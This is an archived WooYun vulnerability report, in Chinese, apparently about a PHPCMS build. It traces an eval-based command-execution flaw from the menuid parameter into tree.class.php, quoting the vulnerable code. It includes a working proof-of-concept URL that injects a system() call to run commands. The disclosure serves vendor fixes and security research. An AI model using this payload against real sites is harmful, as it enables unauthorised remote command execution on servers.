乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-11-26: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2016-01-17: 细节向核心白帽子及相关领域专家公开 2016-01-27: 细节向普通白帽子公开 2016-02-06: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
11.10日下载的gbk版本存在命令执行问题。
tree.class.php中get_treeview函数调用了eval,刚好eval的参数受控
function get_treeview($myid,$effected_id='example',$str="<span class='file'>\$name</span>", $str2="<span class='folder'>\$name</span>" ,$showlevel = 0 ,$style='filetree ' , $currentlevel = 1,$recursion=FALSE) { echo "str ".$str."<br>"."str2 ".$str2; $child = $this->get_child($myid); if(!defined('EFFECTED_INIT')){ $effected = ' id="'.$effected_id.'"'; define('EFFECTED_INIT', 1); } else { $effected = ''; } $placeholder = '<ul><li><span class="placeholder"></span></li></ul>'; if(!$recursion) $this->str .='<ul'.$effected.' class="'.$style.'">'; foreach($child as $id=>$a) { @extract($a); if($showlevel > 0 && $showlevel == $currentlevel && $this->get_child($id)) $folder = 'hasChildren'; //如设置显示层级模式@2011.07.01 $floder_status = isset($folder) ? ' class="'.$folder.'"' : ''; $this->str .= $recursion ? '<ul><li'.$floder_status.' id=\''.$id.'\'>' : '<li'.$floder_status.' id=\''.$id.'\'>'; $recursion = FALSE; if($this->get_child($id)){ eval("\$nstr = \"$str2\";");//str2参数受控制...
content.php中调用了get_treeview函数
if(!empty($categorys)) { $tree->init($categorys); switch($from) { case 'block': $strs = "<span class='\$icon_type'>\$add_icon<a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=\$catid&type=list' target='right'>\$catname</a> \$vs_show</span>"; $strs2 = "<img src='".IMG_PATH."folder.gif'> <a href='?m=block&c=block_admin&a=public_visualization&menuid=".$_GET['menuid']."&catid=\$catid&type=category' target='right'>\$catname</a>"; break; default: $strs = "<span class='\$icon_type'>\$add_icon<a href='?m=content&c=content&a=\$type&menuid=".$_GET['menuid']."&catid=\$catid' target='right' onclick='open_list(this)'>\$catname</a></span>";//我们的menuid参数拼接后,进入到get_treeview函数中 $strs2 = "<span class='folder'>\$catname</span>"; break; } $categorys = $tree->get_treeview(0,'category_tree',$strs,$strs2,$ajax_show); } else { $categorys = L('please_add_category'); } include $this->admin_tpl('category_tree'); exit;
利用$_GET['menuid']构造,造成命令执行
POC:index.php?0=whoami&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block执行whoami命令
我就看看忽略不
危害等级:中
漏洞Rank:5
确认时间:2015-11-23 15:54
感谢
暂无